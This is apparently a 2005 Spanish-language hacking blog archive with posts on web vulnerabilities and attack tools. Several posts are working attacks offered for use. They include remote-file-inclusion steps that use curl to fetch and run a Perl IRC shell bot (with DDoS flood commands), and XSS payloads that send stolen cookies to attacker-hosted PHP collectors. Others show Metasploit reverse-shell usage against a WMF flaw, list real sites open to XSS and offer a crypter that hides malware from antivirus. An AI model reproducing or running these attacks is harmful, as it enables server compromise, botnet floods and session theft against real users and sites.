ecoestadistica.com

sábado, diciembre 31, 2005

Como bajar musica de MySpace (gratis)...

MySpace le permite escuchar muchas canciones; sin embargo, sólo algunas de ellas pueden ser bajadas.

1.-Nos dirijimos a el sitio de MySpace en el que usted quiere bajar la cancion
2. Esa página debe tener al menos una canción disponible para ser bajada
3. Abrimos el Notepad
4. Hacemos click con el botón derecho el link de ¨download¨ de la copia escogida
5.Pegamos ese link en la libreta

se ve un link como este:

http://mp3download.myspace.com/index.cfm?fuseaction= bandprofile.downloadSong&bsid=numero de cancion aqui&song_name= titulo de la cancion aqui &fid=identificacion de la banda aqui

6. Click con el botón derecho en el link y añadir a la copia escogida
7. Pegue el resultado en la libreta
8. Ahora en la original URL sustituyen el viejo número de canción y el viejo título con el nuevo número y el título. Pegamos la URL resultante en la ventana del navegador y damos OK!.
9. Después de varios segundos, le solicitaran si desea bajar la canción.

Un Ejemplo Practico:
Sitio: http://www.myspace.com/monstersarewaiting

Una cancion que podemos bajar ¨ Christine ¨
http://mp3download.myspace.com/index.cfm?fuseaction= bandprofile.downloadSong&bsid=535475&song_name=Christine&fid=7570106

añadimos un link de otra cancion:
asfunction:addSong,2373353^Don%27t%20Go^Monsters %20Are%20Waiting%2E%2E%2E%2E%2E%2E

tenemos una URL con una nueva cancion para bajar de las no permitidas:
http://mp3download.myspace.com/index.cfm?fuseaction= bandprofile.downloadSong&bsid=2373353&song_name= Don%27t%20Go^Monsters%20Are%20Waiting%2E%2E%2E%2E%2E%2E&fid=7570106

Salu2

usaarl.army.mil/ XSS y Sql Injection???

XSS:

ingresamos en en el sitio:

http://www.usaarl.army.mil/search.asp

y tipeamos: <> alert (document.cookie) < / script > y damos a la opcion ¨search¨

Sql injection (errores):

al igual que el procedimiento anterior, tipeamos ¨
' ¨ (sin las comillas) y click en ¨search¨, obtenemos una pagina de error con el siguiente detalle:

Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression 'trtitle LIKE '%'%' ORDER BY trindex'.
/SearchResults.ASP, line 66

Salu2

GMailSite variable XSS y script injection...

GMailSite es script que permite que usted use su cuenta de correo de GMAIL para crear una página en la cual todos los archivos de sus mensajes serán publicados siempre que esten guardados bajo alguna etiqueta en su cuenta del correo.
GMailSite contiene un defecto que permite a un Sitio remoto realizar un ataque Scripting. Este defecto existe porque no se valida la variable 'lng' sobre la sumisión a la escritura index.php. Esto podría permitir a un usuario,crear una URL que ejecutaría código arbitrario en el navegador de un usuario dentro de la relación de confianza entre el navegador y el servidor, conduciendo a una pérdida de integridad del sistema de la victima.
Cuando "inyectamos" HTML o código de javascript en la variable 'lng', este código muestra la coockie y se ejecuta siempre que pulsamos sobre un link en el GMAILSITE.
Este Defecto hace posible la insercion de script`s, y una inclusión de archivo local.

#################
Versiones Afectadas
#################

GMailSite

GmailSite 1.0.4 -
GmailSite 1.0.3 -
GmailSite 1.0.2 -
GmailSite 1.0.1 -
GmailSite 1.0 -

GFHost

GFHost 0.4.2
GFHost 0.4.1
GFHost 0.4
GFHost 0.3
GFHost 0.2
GFHost 0.1.1

Prueba de Concepto:

http://[VICTIM]/?lng=es" > <> alert(document.cookie) < / script >

http://[VICTIM]/index.php?lng=es" > <> alert(document.cookie) < / script >

Fuente:packetstormsecurity.org

Salu2

WMF: Nuevo Modulo Metasploit Framework ...

Acabamos de lanzar una nueva versión del módulo de la hazaña de Metasploit
para el Escape/SetAbortFunc de la ejecución del código. Este módulo ahora rellena una llamada de Escape() con random WMF records. Se publica para redoblar el chequeo de las
Firmas de las identificaciones, ya que la mayoría de las analizadas podrían ser puenteadas fácilmente o dar positivo falso en archivos gráficos válidos.Esto exploit genera una corriente de registro de WMF arbitraria para cada petición.
Disponible vía msfupdate, o descargable de la web oficial:

DOWNLOAD

SOURCE

Salu2

jueves, diciembre 29, 2005

Herramienta:Unfreeze...

Como desactivar el Deepfreeze...

Versiones win 9X y Win 2K/XP

Un pequeño soft desactiva el deep freeze, no solo una vez sino hasta cuando nosotros le demos la instruccion de que vuelva a activarse...

Intrucciones:

Para win 9X bajar el Soft AQUI, luego al abrirlo,simplemente hacemos click en "Boot Frozen" nos saldra algo como

OK: Retrieving info OK: Info retrieved

Luego simplemente para darle la instruccion de cuantas veces al resetear se active solo elegimos: "Boot Thawed on next" y de alli le ingresamos el numero de veces que al resetear la PC se active, una vez hecho esto hacemos click en: "Save Status", y ya tenemos el deep freeze anulado.Hay que destacar que en la gran mayoria de sistemas se debe resetear la PC para que haga efecto el soft, una vez que arranquemos el sistema nuevamente aparecera como desactivado el Deep Freeze

Para win XP/2K bajar el soft AQUI, y la manera de proseguir es exactamente la misma que la anterior.

Salu2

bug de phpCOIN - explicacion...

Esta vez incluire una explicacion para poder ejecutar comandos remotos a traves de un shell perl bot...
Lo primero que debemos hacer es crear en nuestro Host por ejemplo: www.hack.com un directorio llamado db_mysql.php y dentro de el un archivo llamado index.html, luego de crear este ultimo,ingresaremos el siguiente codigo:

?php
passthru("cd /tmp/;curl -o bot.txt http://www.hak.com/bot.txt; perl /tmp/bot.txt");
?

La ruta completa quedaria asi:
http://www.hak.com/db_mysql.php/index.html

Explicacion:
Lo que creamos es un archivo php con un llamado en este caso a curl (usaremos curl debido a que en la gran mayoria de los casos tenemos permisos de ejecucion, mas que usando el wget) que baja un archivo en este caso un shell bot y luego lo ejecuta.

Lo unico que tendriamos que cambiar es: http://www.hak.com/bot.txt por nuestra dir donde se encuentre el bot, el resto dejarlo asi como se encuentra.-

Manera de explotar: manualmente

http://www.server.com/config.php?_CCFG[_PKG_PATH_DBSE]=http://www.hak.com/

(No olvidar ingresar la barra / al final ya que o funcionaria el exploit), luego de eso veremos entrar al bot en nuestro irc.

Bot: bajarlo desde la direccion que puse en un post anterior.

Salu2

Nuevo ¨bug¨ de Windows, sin parche...

Se a publicado un nuevo exploit para windows, que es una version distinta a la consignada en FrSIRT el 30/11/05.Estos archivos de imagen se pueden modificar muy fácilmente para descargar cualquier malware o virus.Ingrese, ayer a la noche, en un sitio con un XP completamente parchado y fui infectado con suma facilidad...
Segurityfocus al respecto aclara:¨El motor grafico de Microsoft Windows WMF es afectado por una vulnerabilidad remota de ejecución de código. El problema se presenta cuando un usuario visualiza un archivo de formato WMF malévolo, accionando la vulnerabilidad cuando el motor procura analizar el archivo. El ¨error¨ se puede explotar remotamente o por un atacante local. Cualquier ejecución del código que ocurra estará con los privilegios del SISTEMA debido a la naturaleza del motor afectado. Microsoft Windows XP se considera vulnerable en el momento. Es probable que otros sistemas operativos de Windows estén afectados también.¨Mas Info.
Cualquier web que exhiba automáticamente una imagen de WMF hará que las máquinas de los usuarios sean infectadas. Esto incluye las viejas versiones de Firefox, versiones actuales de ópera, Outlook y toda versión del Internet Explorer en todas las versiones de Windows.

Codigo para explotar este bug con Metasploit.

Modo de Uso:
msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST xxx.xxx.xxx.xxx
LHOST -> xxx.xxx.xxx.xxx
msf ie_xp_pfv_metafile(win32_reverse) > exploit

[*] Starting Reverse Handler.
[*] Waiting for connections to http://0.0.0.0:8080/anything.wmf
[*] HTTP Client connected from xxx.xxx.xxx.xxx:1060 using Windows XP
[*] Got connection from xxx.xxx.xxx.xxx <-> xxx.xxx.xxx

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\XXXX\Desktop>

Solucion Temporal para este bug:
En una ventana de comandos ponemos:
REGSVR32 /U SHIMGVW.DLL y reseteamos la maquina.Si tienes problemas para visualizar imagenes con windows, vuelve a habilitarla con REGSVR32 SHIMGVW.DLL.

Salu2

Microsoft Internet Explorer MSHTML.DLL HTML Parsing-Dos Vuln.

Butrag:

http://www.securityfocus.com/bid/16079/info

Prueba de Concepto:

PRUEBA

Salu2

martes, diciembre 27, 2005

Microsoft Internet Explorer HTML Parsing-DoS

Butrag:

http://www.securityfocus.com/bid/16070/info

Prueba de Concepto:

PRUEBA 1

PRUEBA 2

PRUEBA 3

salu2

lunes, diciembre 26, 2005

Exploiting PHPGedView (<= 3.3.7)-Explicacion

Una nueva forma de explotar un simple bg basado en el advisore de RGOD (http://rgod.altervista.org) esta vez un fallo en PHPGedView <=3.3.7 versiones menores o iguales a 3.3.7...
No voy a explicar el fallo en si, si quieres leer el advisore completo leelo en esta direccion: http://www.securityfocus.com/archive/1/419906/30/0/threaded

Como buscar vulnerables?, pues googleando : "powered by PHPGedView", una vez localizada alguna web con este sistema lo primero que debemos hacer es crear en nuestro host un archivo con cualquier nombre y extension .txt ejemplo: bot.txt luego simplemente la forma de explotarlo seria: como ejemplo de web vulnerable: www.victima.com/phpgedview agregamos:
help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://www.hack.com/bot.txt nos quedaria algo asi:

http://www.victima.com/DIR_DEL_PHPGEDVIEW/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://www.hack.com/bot.txt

y en el archivo bot.txt ponemos este codigo:

?php
passthru("cd /tmp/;curl -o bot.txt http://www.hak.com/bot.txt; perl /tmp/bot.txt");
?

donde www.hack.com/bot.txt es nuestro bot configurado.
Lo que creamos es un archivo php con un llamado en este caso a curl (usaremos curl debido a que en la gran mayoria de los casos tenemos permisos de ejecucion, mas que usando el wget) que baja un archivo en este caso un shell bot y luego lo ejecuta.

Lo unico que tendriamos que cambiar es: http://www.hak.com/bot.txt por nuestra dir donde se encuentre el bot, el resto dejarlo asi como se encuentra.-

Podes bajar el bot en perl de AQUI
Cambiar unicamente el ADMIN SERVER CANAL y PUERTO nada mas, para darle instrucciones al bot hacemos: NOMBRE_DEL_BOT uname -a por ejemplo.-

Por que la necesidad de bajar bots? pues simple con el podemos ejecutar comando remotos en el servidor victima sin necesidad de dejar nuestra ip guardada, podemos ejecutar CUALQUIER comando solo con estas instrucciones:

Si el bot tiene nombre hack le diremos en el irc: hack uname -a y el bot nos dara la informacion del servidor tambien podemos ejecutar wget gcc etc etc eso se los dejo a su imaginacion, pero tambien tiene otras funciones... sabias que con 50 bots si realizas un UDP a alguien que odies no se levantara por unas cuantas horas? es lo poderoso de tener shellbots =)

Comandos: tomando en cuenta que el bot se llama hack

hack @udpflood PAQUETES TIEMPO (udp muy fuerte)

hack @httpflood PAQUETES TIEMPO (para servidores web)

hack @portscan IP (simple portscanner)

hack !nick NUEVO_NICK (cambia de nick)


y demas funciones que iras aprendiendo si revisas el codigo fuente

Salu2

domingo, diciembre 25, 2005

XSS en Yahoo mail

El filtro del correo de Yahoo no puede detectar script attributes conjuntamente con
style attribute como etiqueta, dejando a cada uno que usa el servicio de correo del yahoo con MSIE,vulnerable a XSS,incluyendo el robo de cookies. Esto es una vulnerabilidad de la seguridad del alto riesgo porque el atacante no tendrá que hacer que la víctima ingrese en ningun enlace, todos lo que tiene que
hacer es enviar el código del Javascript como email HTML a la victima, y
una vez que la víctima abra el email el código será ejecutado adentro
de su browser.
Esto permitirá el hurto de la cookie de sesion, dando el atacante la posibilidad de que tenga acceso a el mail de la víctima por cerca de 24 horas (hasta que la cookie expira).

Codigo

< onload= " alert ('Yahoo mail !, click OK ahora usted ve su cookie ;)'); alert (document.cookie)"> < / style >

fuente:Indian-Hackers

Salu2

Advanced Guestbook remote XSS

Advanced Guestbook es un script basado en PHP.
Index.php and comment.php scripts del php son vulnerables a los ataques de XSS. Este ¨error¨ puede permitir a un atacante puentear los filtros y realizar XSS, HTML
inyección y otros ataques.

Prueba de Concepto:

http://www.example.com/guestbook/index.php?entry=< script > alert(document.cookie);< / script>
http://www.example.com/guestbook/index.php?entry=< iframe
src=http://www.attackersite.com/>

http://www.example.com/guestbook/comment.php?gb_id=1< script >alert(document.cookie);< / script>
http://www.example.com/guestbook/comment.php?gb_id=1< IFRAME
SRC="javascript:alert('XSS');">< / IFRAME>

fuente:securitytracker

Salu2

Multiple Translation websites XSS vulnerability: Google, Altavista, IBM, freetranslation, worldlingo, etc

Lo que sigue es una vulnerabilidad XSS encontrada en los paginas de los traductores online.basicamente el metodo usado por estas paginas consiste en cargar una URL elegida por un usuario con el proposito de traducirla,en hecho luego que la pagina es traducida no se filtra el contenido de la web antes de reflejar el resultado en el browser del usuario.
Un atacante remoto puede construir un código malévolo en una web y subirla a su servidor y hacer que un usuario vulnerable que visita la página medio de una web de traduccion,ejecute el contenido del código en el browser del cliente.
Un ejemplo de código puede ser un código de Javascript para robar a la víctima la cookie


Ejemplo de pagina maliciosa seria:

<>location.href='http://www.webatacante.com/XXX.php?cookie='+escape(document.cookie)< / SCRIPT>

El código Javascript dirigira a víctima a el script php del atacante
para tomar la información de la cookie y entonces regístrela y envíarla al email del atacante.

Ejemplo de un script php:

< ? php $cookie = $_GET['cookie']; $ip = getenv("REMOTE_ADDR"); $msg = "Cookie: $cookie\nIP Address: $ip"; $subject = "cookie"; mail("mail_del_atacante", $subject, $msg); ? >

Como proposito de prueba se puede utilizar el codigo siguiente:

<> alert('VULNERABLE'); alert(document.cookie);< / script >

Prueba de Concepto:

paralink:

http://webtranslation.paralink.com/webtranslation.asp?clientid=default&appid=default&b=1&dir=en/fr&dic=general&extsvr=&auto=1&url=http://www.atacante.com/codigo-malicioso.html

Google:

http://translate.google.com/translate?u=http://www.atacante.com/codigo-malicioso.html

Freetranslation:

http://fets3.freetranslation.com/?Url=http%3A%2F%2Fwww.atacante.com%2Fcodigo-malicioso.html&Language=English%2FSpanish&Sequence=core

Altavista:

http://babelfish.altavista.com/babelfish/urltrurl?tt=url&url=http://www.atacante.com/codigo-malicioso.html&lp=zh_en

IBM:

http://www.alphaworks.ibm.com/aw.nsf/html/mt
http://192.195.29.104/demand?mtlang=enfr&translate=http%253A%252F%252Fwww.atacante.com%252Fcodigo-malicioso.html

Worldlingo:

http://www.worldlingo.com/wl/services/S221S1U3QrQ4rVX1J4x4O5WifQlI6nxpL/translation?wl_trglang=DE&wl_rurl=http%3A%2F%2Fwww.atacante.com&wl_url=http%3A%2F%2Fwww.atacante.com%2Fcodigo-maliciso.html

Comprendium:

http://www.comprendium.es/index_demo_text_ca.html

online-translator:

http://www.online-translator.com/url/tran_url.asp?lang=en&url=http%3A%2F%2Fwww.atacante.com%2Fcodigo-malicioso.html&direction=er&template=General&cp1=NO&cp2=NO&autotranslate=on&transliterate=on&psubmit2.x=44&psubmit2.y=12

systranbox:

http://www.systranbox.com/systran/box

fuente:seclists

Salu2

viernes, diciembre 23, 2005

Vulnerabilidad de Productos de Symantec...

Nada menos que 63 productos de Symantec presentan una vulnerabilidad crítica no parcheada, que puede conducir al compromiso total del sistema por un atacante remoto.

Entre los afectados, productos tan populares como Norton Antivirus y Norton Internet Security...

Las vulnerabilidades críticas en productos de seguridad resultan especialmente preocupantes, sobre todo cuando ya existen antecedentes similares.
A la espera de un parche, algunos expertos recomiendan deshabilitar el escaneo de ficheros comprimidos RAR.

salu2

jueves, diciembre 22, 2005

MP3.COM XSS BUG

mp3.COM tiene un defecto que permite un ataque XSS. Este defecto existe porque la entrada a la pregunta en el parametro de "search.php "no se esteriliza correctamente antes de ser devuelto al usuario.
Esto podría permitir que un usuario cree un URL que ejecutaría código arbitrario en el browser de un usuario dentro de la relación de la confianza entre el browser y el servidor, y compromenter su sistema.

Prueba de Concepto:

AQUI

Salu2

Bug en Yahoo...???

Un atacante puede manipular datos de entrada del URL en Yahoo, esto puede ser explotado para la entrada de cualquier script creada por un intruso.

Prueba de Concepto:

http://de.mf.news.yahoo.com/mailto?url=http://hostatacante.com/badscript&title
=[aqui texto XSS]

AQUI UN EJEMPLO

Salu2

Películas que acaban mal

Por si teníamos pocas preocupaciones, ahora también hay que tener cuidado con los ficheros de vídeo .mov.
Y es que los reproductores multimedia de Apple (iTunes y QuickTime, en sus últimas versiones para OS X y Windows) presentan varias vulnerabilidades no parcheadas, al menos una de las cuales provoca una denegación de servicio (es decir, un "cuelgue"), que podría permitir la ejecución de código malicioso por parte de un intruso.
Hay publicadas dos demostraciones: una que cuelga QuickTime y otra que cuelga QuickTime e iTunes...
Hace un mes que Apple conoce esta vulnerabilidad

Salu2

miércoles, diciembre 21, 2005

Google como proxy libre.

En aquellos sitios donde tengamos restringido el acceso a determinados contenidos de Internet, Google puede ser empleado como servidor proxy gratuíto.

Algunas universidades, colegios, empresas restringen la navegación a determinados stios, pero ninguna bloquea el acceso a Google.

El truco, que ha sido publicado por Oreillynet, aprovecha la funcionalidad Google translator para que este actúe como servidor proxy.

A modo de ejemplo:

http://www.google.com/translate?langpair=en|es&u=www.forbiddensite.com

Nos mostrará la página "www.forbiddensite.com" desde su idioma original ingles "traducida" al español (en|es).

Imaginad que queremos visitar la página de El Marca, y tenemos el acceso a la misma bloqueado, bastará con:

http://www.google.com/translate?langpair=es|es&u=www.marca.es

Articulo en Oreillynet

PD: ya existe un plugin para Google proxy, el cual ha sido creado hoy día 21 de Diciembre y que podéis acceder a instalarlo desde este enlace. Se trata de añadir este “motor” dentro del campo de búsquedas para Firefox.

Salu2

phpBB <= 2.0.18 XSS Cookie Disclosure

en el phpbb code ponemos:
Código:
< b c = " " > " ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=null`style='font-size:0; X="'


donde ¨c.php¨ contiene la siguiente data:

Código:
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer=getenv ('HTTP_REFERER');
$fl = fopen('log.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
fclose($fl);
?>

Fuente:milw0rm

Salu2

XSS en Google.com!

Dos vulnerabilidades XSS fueron identificadas en el sitio web Google.com,
que permite a un atacante suplantar a los miembros legítimos de los servicios de Google o montar un ataque de phishing.
Aunque Google use defensas contra el XSS, un ataque es posible, usando ¨UTF-7 encoded payloads¨.

Google's URL redireccion script
----------------------------------
El script (http://www.google.com/url?q=...) es usado normalmente para redireccionar el navegador desde el sitio de GOOGLE ,a otros sitios.Por ejemplo:
http://www.google.com/url?q=http://www.hackyashira.com

Cuándo en el parametro (Q) es introducida una escritura con formato ilegal

(El formato parece ser: http: //domain), una pagina "403 Forbidden",regresa al usuario, informando que la pregunta era ilegal.

El valor del parámetro con el error aparece en el HTML vuelto al usuario.

Cuando solicitamos algo como esto:

http://www.google.com/url?q=USER_INPUT

obtenemos como respuesta:
"403 Forbidden" "Your client does not have permission to get URL
/url?q=USER_INPUT from this server."

La respuesta del servidor ignora la codificación del charset, por ejemplo:
* Response headers: " Content - Type: text / html; charset = [ encoding ] ".

* Response body: "< meta http-equiv = " Content-Type" (...)
charset = [ encoding ]/ >".


Google's 404 NOT FOUND mechanism
------------------------------------------
Al solicitar una página que no existe en www.google.com, una pagina con la respuesta ¨404 NOT FOUND¨ se devuelve al usuario, con la trayectoria original solicitada.

Si solicitamos:
http://www.google.com/NOTFOUND
el siguiente texto aparece en la respuesta:¨"Not Found
The requested URL /NOTFOUND was not found on this server."

La respuesta del servidor ignora la codificación del charset, por ejemplo:
* Response headers: "Content-Type: text/html; charset=[encoding]".

* Response body: " < meta http - equiv = " Content - Type " (...)
charset = [ encoding ] / > ".


Vulnerabilidad XSS
---------------------
Mientras que los mecanismos ya mencionados ( (URL redirection script,
404 NOT FOUND) caracteres comunes del escape usados para XSS, por ejemplo < >(paréntesis triangulares) y apóstrofes, no puede dirigir
¨UTF-7 encoded payloads¨ peligrosas.
Por lo tanto, al enviar un payloads en un ataque de XSS, codificado en UTF-7, el payloads volverá con la respuesta sin ser alterado.

Para que el ataque tenga existo (script execution), el browser de las victimas debe permitir la carga de XSS como UTF-7.

IE:auto-seleccion de codificacion
------------------------------------
Si la ' codificación ' se fija en ' Auto-Select', y el Internet-Explorador encuentra la Secuencia UTF-7 en los primeros 4096 caracteres del cuerpo de la respuesta, fijará el charset que codifica a UTF-7 automáticamente.
Esta característica de seleccion de codificación automática permite montar
Ataques de UTF-7 XSS contra Google.COM.

Fuente:http://www.watchfire.com/

salu2

Vulnerabilidades XSS en sitios Web's de telefonia...

SonyEricsson:

BUG

en el campo de la ¨busqueda¨ insertar XSS

SAGEM:

BUG

en el campo ¨Correo electronico¨ insertar XSS

Motorola:
Un caso parecido a los anteriores, sin embargo ellos utilizan para su servicio de compras a ¨digitalriver¨

BUG1

BUG2

Siemens:

BUG1

BUG2

Nokia:

BUG

Salu2

El sitio de Ebay es Seguro????...

prueba con este enlace:

EBAY

Salu2

lunes, diciembre 19, 2005

Microsoft Windows Excel-DoS

Los ¨Bugs¨ 1 y 2 no son bastante similares pero, ambos son bugs ¨null pointer¨. En bug 1 se debe a un mod ¨grafic's pointer¨ para señalar a un área mala, y en el bug 2 el error esta en el tamaño del nombre de la pagina.

Prueba de Concepto:

Bug 1

Bug 2

Fuente:packetstorm

Salu2

domingo, diciembre 18, 2005

Listado de Sitios Vulnerables a XSS...

Federal
Reserve Bank of New York

CompUSA
SBC
EPA
ABC News
BlockBuster (Injectar XSS en ¨movie search¨)
BizRate
CNET
Geico Insurance
Oracle
Cingular
Poetry.com
US Dept. Of State
Journal Sentinel
National
Institutes of Health

Federal Deposit Insurance Corporation
DHL (Injectar XSS dentro de ¨tracking search number¨)
Internet Movie Database Inc.
Washington Post
World Bank
CBS News
DrudgeReportArchives
D-Link
Nortel Networks
ThermalTake
M&T Bank

Fuente:hackers-news.com

salu2

sábado, diciembre 17, 2005

phpBB 2.0.18 XSS and Full Path Disclosure

--- 1. XSS ---
Si en phpbb es permitido etiquetas HTML tales como b,i,u,pre y tenemos en nuestro perfil
"Always allow HTML: YES"
se pueden usar estas etiquetas:

/b c = "" \ " onmouseover="alert('Mousehack')" X=" /b\ H O L A //b
Exploit:

/b c = "" \ "
onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)"
X= "/b\ H O L A //b
y asi se obtiene la cookie.

- --- 2. Full Path Disclosure ---
En el archivo admin/admin_disallow.php tenemos:

- -25-31---
if( !empty($setmodules) )
{
$filename = basename(__FILE__);
$module['Users']['Disallow'] = append_sid($filename);

return;
}
- -25-31---

La funcion append_sid() no existe. Y si usted tiene:

register_globals = On
display_errors = On

podemos usar:
http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1

lo que muestra:
- -RESULT ERROR---
Fatal error: Call to undefined function: append_sid()
in /www/2018/phpBB2/admin/admin_disallow.php on line 28
- -RESULT ERROR---

fuente:securityreason.com

Nota: remplazar las ¨/\¨por las ¨<->¨correspondientes y suprimir los espacios

salu2

XSS in nsa.gov?

En el dia de hoy recibi un mail, que transcribo textual:
¨Hola soy Preddy encontre un vuln de XSS en el Nsa.gov Como tu sabes que nsa.gov es el sitio web de la Agencia Nacional de la Seguridad.
Hice un video que lo demuestra. Mandé correo electrónico a la administración varias veces pero no responden.. quizá se durmieron..entonces decidí hacer público el desperfecto.

Download:
http://www.megaupload.com/?d=4VSX2WFL
http://rapidshare.de/files/9165646/nsa.rar.html

Saludos de
Preddy
RootShell Security Group¨

Salu2


viernes, diciembre 16, 2005

MS Internet Explorer 6.0 (pre tag multiple single tags) DoS

Prueba de Concepto:

< !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
< html>
< head>
< title>Lets IE crash< /title>
< style type="text/css">
pre {
white-space:normal;
}
< /style>
< /head>

< body>

< pre>
< span>< span>
< /pre>

< /body>

< /html>

Fuente:milw0rm.com

Para probar:

http://mousehack.noads.info/tag.html

Salu2

Gmail ya se puede leer desde el móvil...

Así, si tecleamos en el navegador de nuestro teléfono móvil m.gmail.com, podremos tener acceso a todos los correos de nuestra cuenta Gmail, pero además, podremos visualizar documentos adjuntos en PDF o Word.

Evidentemente, la interfaz de este servicio se encuentra adaptado al dispositivo móvil . Google ha puesto además a nuestra disposición un listado de teléfonos donde podemos comprobar si el nuestro es 100% compatible.

De momento, la interfaz que aparece sólo se encuentra en inglés.

Más información | Gmail.

Sitio Oficial | gmail móvil.

Salu2

jueves, diciembre 15, 2005

Paper: Evitar las restricciones de Sistema siendo usuario Limitado...

Los administradores de Windows deben estar enterados que si un usuario, incluso en funcionamiento con una cuenta limitada, puede ejecutar un programa de su eleccion, que también pueden evitar muchas de las restriciiones del sistema, incluyendo aquellas dirigidas específicamente a establecer la seguridad de por ejemplo: políticas de restricción del software y del Internet Explorer.

Eso significa que esos usuarios pueden alterar el código o los datos de sus propios procesos, incluyendo explorador e Internet Explorer, y manipulando el código o los datos relacionados con la aplicación de la política de restrincion del sistema, pueden puentear esas limitaciones.

Las políticas de la restricción del software o Software Restriction Policies (SRP) son otro ejemplo de las limitaciones que se pueden derribar por los usuarios limitados si usted permite que utilicen un ejecutable de su eleccion- es decir si usted no aplica la SRP correctamente usándolo para definir a los usuarios que executables pueden usar (whitelisting) en vez simplemente de seleccionar executables que usted no quisiera que se utilizacen en general (blacklisting) que es lo comun. Cuando un usuario lanza un proceso, la SRP comprueba la lista predifinida, para establecer si la ejecución se permite o se bloquea.

Gpdisable es un programa que demuestra la facilidad con la cual SRP se puede inhabilitar por accion un usuario limitado. El programa utiliza las técnicas de la inyección del DLL descritas por Jeff Richter en Programming Applications for Microsoft Windows para cargar un DLL en todos los procesos en el sistema a el cual el usuario que lo utiliza tiene acceso. El DLL coloca un gancho en el NtQueryValueKey API de modo que intercepte cualquier llamada del API hecho por esos procesos o DLLs que ha cargado. El código de Windows SRP utiliza NtQueryValueKey para preguntar el valor HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\TransparentEnabled del registro, que si esta presente y diferente a cero indica que SRP está activado. Aquí está una pista de Cmd.exe, utilizando Regmon, leyendo el valor en respuesta a un intento de ejecución de Notepad.exe, que fue rechazado usando SRP:

Los usuarios no tienen el permiso de modificar claves del registro HKLM, incluyendo los ajustes de SRP, pero Gpdisable engaña el código de SRP volviendo un valor del error, STATUS_OBJECT_NAME_NOT_FOUND, siempre que ve un valor denominado “TransparentEnabled” pasó a NtQueryValueKey:


Este screenshot demuestra que "el sistema no puede ejecutar el programa especificado."segun el alert de SPR, en el intento fallido de querer ejecutar Notepad.exe en una cuenta limitada del usuario ,seguido por la ejecución de Gpdisable y una ejecución posible subsecuente de Notepad.exe (la razón que lanzo otro aviso de alerta para la segunda ejecución es que SRP deposita el valor de TransparentEnabled cuando lanza el primer proceso ):

La imagen de Regmon de la segunda ejecución de notepad.exe, parece similar a la primera con la excepción principal que la pregunta de TransparentEnabled falta: Gpdisable lo interceptó en usuario-modo y así que la llamada nunca progresó en el kernel.

¿Qué otros escenarios del sistema de restricciones son susceptibles a este tipo del ataque? Los escenarios de la seguridad son impuestos por componentes de sistema operativo no accesible a usuarios limitados, pero a la mayor parte de los escenarios en el área de Componentes de Windows, del administrador de la Política de restrincciones del sistema es ineficaz en los ambientes donde usuarios finales pueden correr las aplicaciones de su eleccion tales como Gpdisable.

Es también importante notar que la habilidad de usuarios limitados a hacer caso omiso a estas restricciones no es debido a un ¨BUG¨ en Windows, sino simplemente permitido por decisiones de diseño hechas por el equipo de Microsoft.

Escrito por Marck Russinovich

Traduccion y adaptacion:

Mousehack

Salu2

miércoles, diciembre 14, 2005

Agujero en el web del gobierno USA que recopila agujeros en webs

El sitio web del NIST (organismo oficial del gobierno norteamericano para estándares y tecnología, que además alberga la base nacional de vulnerabilidades) presentaba una vulnerabilidad del tipo Cross Site Scripting, descubierta y publicada en Internet por la gente de RootShell.

Hasta entonces, los responsables de valorar los riesgos de ciberataques fueron incapaces de detectarla, pese a que en su base de datos almacenan numerosos ejemplos de vulnerabilidades de este tipo...

Salu2

Microsoft parchea cuatro fallos de Internet Explorer y uno de Windows 2000

Microsoft publicó ayer dos boletines de seguridad que permiten parchear cuatro vulnerabilidades de Internet Explorer (dos de ellas críticas) y una de Windows 2000. Todos ellos está disponibles vía actualizaciones automáticas.

Como dato curioso, uno de los parches elimina los perniciosos efectos de otro parche: el desinstalador de Sony, que dejaba el sistema expuesto a la instalación de software por cualquiera...

Salu2

lunes, diciembre 12, 2005

Herramienta: Nuevo Encryptador NME v1.0


Por ahora es detectado unicamente por Dr. Web y ClamAV.
Combiando con otras utilidades deja el server totalmente indetectable a todos los AV.
Despues de encryptar el server, permite ser comprimido manualmente con el UPX.

Developer: redlime
Compiler: Delphi
Date Released: December 9th, 2005
Package Size: 290 kb
Stubsize: ~9.5kb
Compatibility: Windows Me/NT/2000/XP
Last Version Released: 1.0

Caracteristicas:
* Makes everything undetected
* Loads the decrypted file in memory and does not write it to disc
* Icon may be changed directly in the builder
* Crypting files with data at the end of the file is supported
* ~9.5kb stub
* Manual UPX-packing before crypting is supported (compression)

Download:

http://www.swerat.com/downloads.php?file=NME

Salu2

Más de lo mismo: Windows Vista también "apuesta por la seguridad"

La campaña "A la seguridad por Windows Vista" está definitivamente en marcha.

Microsoft parece falto de ideas. También basó la campaña de Windows XP en la mejora de la seguridad y hay que ver lo que nos hemos reído desde entonces.

Baste decir que, a día de hoy, Windows XP aún tiene un 23% de vulnerabilidades no parcheadas...

salu2

viernes, diciembre 09, 2005

El antivirus de Microsoft junta demasiados datos...

La compañía de seguridad CSIS considera que el nuevo programa antivirus de Microsoft junta demasiada información del PC.

El nuevo programa de seguridad basado en web, Windows Live Safety Scanner, busca con excesivo interés el material que el usuario tenga almacenado en el PC, para luego notificar a Microsoft. La información anterior corresponde a la compañía danesa de seguridad informática CSIS, que ha probado el programa Windows Live Safety Scanner.

